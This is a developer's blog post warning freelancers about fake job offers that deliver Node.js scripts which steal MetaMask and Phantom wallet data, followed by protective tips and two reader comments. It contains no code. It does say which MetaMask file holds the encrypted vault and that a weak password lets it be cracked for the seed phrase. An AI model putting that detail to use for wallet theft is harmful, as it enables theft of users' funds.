🚨 Warning for Freelance Blockchain Developers: Beware of a New Scam!
Freelance developers, especially those working on blockchain and cryptocurrency projects, need to be vigilant about a new scam spreading across popular freelancing platforms. This scam involves a malicious Node.js script that scans a user’s storage and exfiltrates sensitive data, including browser wallet caches from extensions like Phantom and MetaMask.
I got this offers personally from Linkedin and Freelancer.com
🛑 How the Scam Works
-
Fake Job Offer:
- The scam begins when a "client" contacts a developer on platforms like LinkedIn, Upwork, or Fiverr with a seemingly legitimate job offer.
-
Malicious Code Delivery:
- After some discussions, the scammer provides a JavaScript or Node.js script for the developer to integrate into their project.
-
Hidden Malicious Payload:
- The script contains hidden code that:
- Scans Local Storage: Looks for files or caches from browser wallet extensions like Phantom and MetaMask.
- Extracts Sensitive Data: Gathers private keys, wallet addresses, or other critical information.
- Exfiltrates the Data: Sends the stolen information to a remote server controlled by the scammer.
- The script contains hidden code that:
💥 The Impact
This scam is particularly dangerous because it targets developers who often work with sensitive financial data. By compromising a developer’s local environment, the scammer gains access to:
- Cryptocurrency wallets.
- Login credentials.
- Other critical information stored on the system.
For developers using browser wallet extensions like Phantom and MetaMask, the consequences can be severe. Losing access to these wallets often results in substantial financial losses.
🛡️ How to Protect Yourself
Take these precautions to avoid falling victim to this scam:
-
Thoroughly Review Client Requests:
- Scrutinize any code provided by clients, especially if it accesses or manipulates local storage.
- If you don’t fully understand the code, seek advice from peers or use online resources to verify its legitimacy.
-
Use Sandboxed Environments:
- Run untrusted code in a sandboxed environment or a virtual machine to prevent it from accessing your main system’s storage.
-
Implement Security Best Practices:
- Stay informed about the latest security threats targeting developers by following cybersecurity blogs, forums, and news outlets.
📊 What the Hacker Gets
Here’s an example of the kind of data a hacker can extract:
In the folder Metamask for example in image above, you’ll find a file named 000005.ldb or something similar. The exact number may vary, but it should be a low numerical value, such as 000004 or 000005. If the number is significantly higher, it is not the vault.
The hacker could decrypt that file if you’re not using a strong encryption password, potentially gaining access to your seed phrase—and as a result, you could lose your funds.
🔒 Conclusion
Do not run untrusted scripts on your main OS. Always use a virtual machine or Docker container with limited permissions to test potentially malicious code.
By staying vigilant and adopting secure practices, you can safeguard yourself and your projects from these scams. Stay safe! 🚀
Top comments (2)
Thanks for sharing valuable article.
Yeah, you are right.
Nowadays there are rise of scam projects on Upwork, Freelancer, and Linkedin.
They camouflaged themselves as a HR manager or CEO, and give you Github or Gitlab projects(mostly GitLab) and saying its part of hiring process.
They wanted to run the project locally and record videos.
In their code, especially backend code, there is an external API call for access all the files on Drive C.
They were trying to find secret keys or passwords, sth like that.
So we need to be aware of that.
In that sense, I think this article will be valuable for us.
Thanks again
I have also faced same sammers.
Thanks for shairng article